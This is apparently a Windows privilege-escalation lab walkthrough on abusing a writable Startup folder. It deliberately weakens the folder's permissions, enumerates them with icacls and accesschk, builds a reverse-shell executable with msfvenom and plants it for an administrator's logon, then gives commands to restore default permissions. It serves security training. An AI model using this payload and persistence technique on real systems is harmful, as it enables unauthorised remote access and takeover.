Logon Autostart Execution via Startup Folder is a Windows feature that enables specific programs or scripts to launch automatically when a user logs into the system. This feature allows these programs or scripts to launch automatically without any manual action from the user when the operating system starts up.
Attackers may exploit the Logon Autostart Execution feature by inserting malicious software into the Startup Folder. This enables the malicious code to automatically launch during system startup, potentially granting it elevated privileges.
- Navigate via File Explorer to the directory which contains StartUp Folder using the following path:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
Outcome:
- Right click on Startup folder and choose properties option:
- Choose the 'Security' tab and select the 'Users' group:
- Assign Full Control or Read and Write permissions to the Users group and then press the 'Apply' button:
To set up the lab with the 'Logon Autostart Execution (Startup Folder)' scenario use the custom PowerShell script named LogonAutostartExecutionStartupFolder.ps1.
Open a PowerShelll with local Administrator privileges and run the script:
.\LogonAutostartExecutionStartupFolder.ps1
Outcome:
To perform manual enumeration and identify whether a Windows workstation is vulnerable to the Startup Folder Autoruns issue, you can use the following command from a command prompt:
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Outcome:
To perform an enumeration of the Startup Folder Autoruns
vulnerability, you can use accesschk.exe or accesschk64.exe from Sysinternals Suite and execute the following command with appropriate arguments:
accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Outcome:
- Use msfvenom to generate a malicious executable (exe) file that can be executed via the booting of the victim's machine:
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe
-
Transfer the malicious executable file to victim's machine.
-
Move the malicious executable file to 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'.
Outcome:
-
Open a listener on your Kali machine.
-
Reboot the victim's machine and login as Adminstrator:
- Verify the reverse shell on your Kali machine:
Properly configured permissions within the Startup Folder act as a preventive measure against unauthorized modifications or executions of files within the directory. This proactive approach effectively reduces the likelihood of malicious programs or scripts launching automatically during system booting.
Moreover, to restore the default permissions of the Startup Folder, utilize the following commands with elevated privileges:
takeown /F "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /A /R /D Y
and
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /reset /T /C /Q